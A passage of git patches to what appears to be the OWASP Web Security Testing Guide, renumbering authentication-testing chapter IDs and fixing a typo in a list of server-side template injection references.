rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/09-Testing_for_Weak_Password_Change_or_Reset_Functionalities.md
rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/08-Testing_for_Weak_Password_Change_or_Reset_Functionalities.md
index 882b799c0e..8837ee57d8 100644
--- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/09-Testing_for_Weak_Password_Change_or_Reset_Functionalities.md
+++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/08-Testing_for_Weak_Password_Change_or_Reset_Functionalities.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-ATHN-09|
+|WSTG-ATHN-08|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/10-Testing_for_Weaker_Authentication_in_Alternative_Channel.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/09-Testing_for_Weaker_Authentication_in_Alternative_Channel.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/10-Testing_for_Weaker_Authentication_in_Alternative_Channel.md
rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/09-Testing_for_Weaker_Authentication_in_Alternative_Channel.md
index 4d1ee5b7eb..531b8d1935 100644
--- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/10-Testing_for_Weaker_Authentication_in_Alternative_Channel.md
+++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/09-Testing_for_Weaker_Authentication_in_Alternative_Channel.md
@@ -2,7 +2,7 @@
 
 |ID          |
 |------------|
-|WSTG-ATHN-10|
+|WSTG-ATHN-09|
 
 ## Summary
 
diff --git a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/11-Testing_Multi-Factor_Authentication.md b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/10-Testing_Multi-Factor_Authentication.md
similarity index 99%
rename from document/4-Web_Application_Security_Testing/04-Authentication_Testing/11-Testing_Multi-Factor_Authentication.md
rename to document/4-Web_Application_Security_Testing/04-Authentication_Testing/10-Testing_Multi-Factor_Authentication.md
index c08e924e91..f37c07a21d 100644
--- a/document/4-Web_Application_Security_Testing/04-Authentication_Testing/11-Testing_Multi-Factor_Authentication.md
+++ b/document/4-Web_Application_Security_Testing/04-Authentication_Testing/10-Testing_Multi-Factor_Authentication.md
@@ -2,11 +2,11 @@
 
 |ID          |
 |------------|
-|WSTG-ATHN-11|
+|WSTG-ATHN-10|
 
 ## Summary
 
-Many applications implement Multi-Factor Authentication (MFA) as an additional layer of security to protect the login process. This is also known as two-factor authentication (2FA) or two-step verification (2SV) - although these are not strictly the same thing. MFA means asking the user to provide *at least* two different [authentication factors](#types-of-mfa) when logging in.
+Many applications implement Multi-Factor Authentication (MFA) as an additional layer of security to protect the login process. This is also known as two-factor authentication (2FA) or two-step verification (2SV) - although these are not strictly the same thing. MFA means asking the user to provide *at least* two different [authentication factors](#types-of-mfa) when    logging in.
 
 MFA adds additional complexity to both the authentication functionality, and also to other security-related areas (such as credential management and password recovery), meaning that it is critical for it to be implemented in a correct and robust manner.
 

From c8dd891bb9347a4d85b48e5e628d868fb685f804 Mon Sep 17 00:00:00 2001
From: Manindar Mohan <53038087+manindar-mohan@users.noreply.github.com>
Date: Mon, 24 Jul 2023 18:10:09 +0530
Subject: [PATCH 37/37] Update
 document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md

Co-authored-by: ThunderSon <32433575+ThunderSon@users.noreply.github.com>
---
 .../17-Testing_for_Server-side_Template_Injection.md            | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md
index f4e8d94a3c..6cab22eb01 100644
--- a/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md
+++ b/document/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Server-side_Template_Injection.md
@@ -120,7 +120,7 @@ The tester can also identify what other objects, methods and properties can be e
 - [James Kettle: Server-Side Template Injection:RCE for the modern webapp (whitepaper)](https://portswigger.net/kb/papers/serversidetemplateinjection.pdf)
 - [Server-Side Template Injection](https://portswigger.net/blog/server-side-template-injection)
 - [Exploring SSTI in Flask/Jinja2](https://www.lanmaster53.com/2016/03/exploring-ssti-flask-jinja2/)
-- [Server-ide Template Injection: from detection to Remote shell](https://www.okiok.com/server-side-template-injection-from-detection-to-remote-shell/)
+- [Server-side Template Injection: from detection to Remote shell](https://www.okiok.com/server-side-template-injection-from-detection-to-remote-shell/)
 - [Extreme Vulnerable Web Application](https://github.com/s4n7h0/xvwa)
 - [Divine Selorm Tsa: Exploiting server-side template injection with tplmap](https://owasp.org/www-pdf-archive/Owasp_SSTI_final.pdf)
 - [Exploiting SSTI in Thymeleaf](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/)